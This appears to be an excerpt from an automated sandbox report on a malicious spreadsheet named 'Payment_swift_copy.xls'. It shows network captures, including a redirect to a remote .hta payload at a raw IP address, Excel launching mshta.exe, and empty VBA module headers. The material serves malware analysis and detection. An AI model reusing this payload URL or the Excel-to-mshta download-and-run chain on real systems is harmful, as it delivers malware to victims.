            2024-12-16 09:06:21 UTC | 108 | IN | Data Ascii: Found. Redirecting to http://192.3.122.159/121/vfc/clearentirethingwithbestnoticetheeverythinggooodfrome.hta


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            1 | 192.168.2.25 | 49729 | 13.107.246.63 | 443
            Timestamp | Bytes transferred | Direction | Data
            2024-12-16 09:06:22 UTC | 222 | OUT | GET /rules/officeclicktorun.exe-Production-v19.bundle HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.18129; Pro)
            Host: otelrules.svc.static.microsoft
            2024-12-16 09:06:23 UTC | 471 | IN | HTTP/1.1 200 OK
            Date: Mon, 16 Dec 2024 09:06:23 GMT
            Content-Type: text/plain
            Content-Length: 377760
            Connection: close
            Vary: Accept-Encoding
            Cache-Control: public
            Last-Modified: Sun, 15 Dec 2024 16:03:00 GMT
            ETag: "0x8DD1D21F2E265EA"
            x-ms-request-id: 4e9e4142-e01e-0051-296f-4f84b2000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241216T090623Z-156796c549b962xshC1EWRx3hc00000008f00000000021b8
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            2 | 192.168.2.25 | 49747 | 13.107.246.63 | 443 | 8188 | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            Timestamp | Bytes transferred | Direction | Data
            2024-12-16 09:07:00 UTC | 226 | OUT | GET /rules/excel.exe-Production-v19.bundle HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
            Host: otelrules.svc.static.microsoft
            2024-12-16 09:07:00 UTC | 500 | IN | HTTP/1.1 200 OK
            Date: Mon, 16 Dec 2024 09:07:00 GMT
            Content-Type: text/plain
            Content-Length: 1113975
            Connection: close
            Vary: Accept-Encoding
            Cache-Control: public
            Last-Modified: Sun, 15 Dec 2024 16:03:00 GMT
            ETag: "0x8DD1D21F2F6AE4C"
            x-ms-request-id: 8d1f2229-801e-00ac-5168-4ffd65000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241216T090700Z-156796c549b962xshC1EWRx3hc00000008cg00000000342h
            x-fd-int-roxy-purgeid: 0
            X-Cache-Info: L2_T2
            X-Cache: TCP_REMOTE_HIT
            Accept-Ranges: bytes
            2024-12-16 09:07:00 UTC | 15884 | IN | Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
            2024-12-16 09:07:00 UTC | 16384 | IN | Data Ascii: S T="1" /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C
            2024-12-16 09:07:00 UTC | 16384 | IN | Data Ascii: </A> </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C
            2024-12-16 09:07:01 UTC | 16384 | IN | Data Ascii: "AND"> <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE">
            2024-12-16 09:07:01 UTC | 16384 | IN | Data Ascii: T="U32" I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C>
            2024-12-16 09:07:01 UTC | 16384 | IN | Data Ascii: 1.0" encoding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e2
            2024-12-16 09:07:01 UTC | 16384 | IN | Data Ascii: ="2" E="TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S>
            2024-12-16 09:07:01 UTC | 16384 | IN | Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R>
            2024-12-16 09:07:01 UTC | 16384 | IN | Data Ascii: </F> <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownExcep
            2024-12-16 09:07:01 UTC | 16384 | IN | Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L



            Target ID:0
            Start time:04:05:17
            Start date:16/12/2024
            Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
            Imagebase:0x7ff776930000
            File size:70'082'712 bytes
            MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:5
            Start time:04:05:43
            Start date:16/12/2024
            Path:C:\Windows\System32\appidpolicyconverter.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\appidpolicyconverter.exe"
            Imagebase:0x7ff74adc0000
            File size:155'648 bytes
            MD5 hash:6567D9CF2545FAAC60974D9D682700D4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:6
            Start time:04:05:43
            Start date:16/12/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7c7360000
            File size:1'040'384 bytes
            MD5 hash:9698384842DA735D80D278A427A229AB
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            Target ID:16
            Start time:04:06:21
            Start date:16/12/2024
            Path:C:\Windows\System32\mshta.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\mshta.exe -Embedding
            Imagebase:0x7ff727390000
            File size:32'768 bytes
            MD5 hash:36D15DDE6D71802D9588CC0D48EDF8EA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:17
            Start time:04:06:25
            Start date:16/12/2024
            Path:C:\Windows\splwow64.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\splwow64.exe 12288
            Imagebase:0x7ff708d60000
            File size:192'512 bytes
            MD5 hash:AF4A7EBF6114EE9E6FBCC910EC3C96E6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:30
            Start time:04:06:53
            Start date:16/12/2024
            Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Payment_swift_copy.xls"
            Imagebase:0x7ff776930000
            File size:70'082'712 bytes
            MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Module: Sheet1

            Declaration
            Attribute VB_Name = "Sheet1"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True

            Module: Sheet2

            Declaration
            Attribute VB_Name = "Sheet2"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True

            Module: ThisWorkbook

            Declaration
            Attribute VB_Name = "ThisWorkbook"
            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
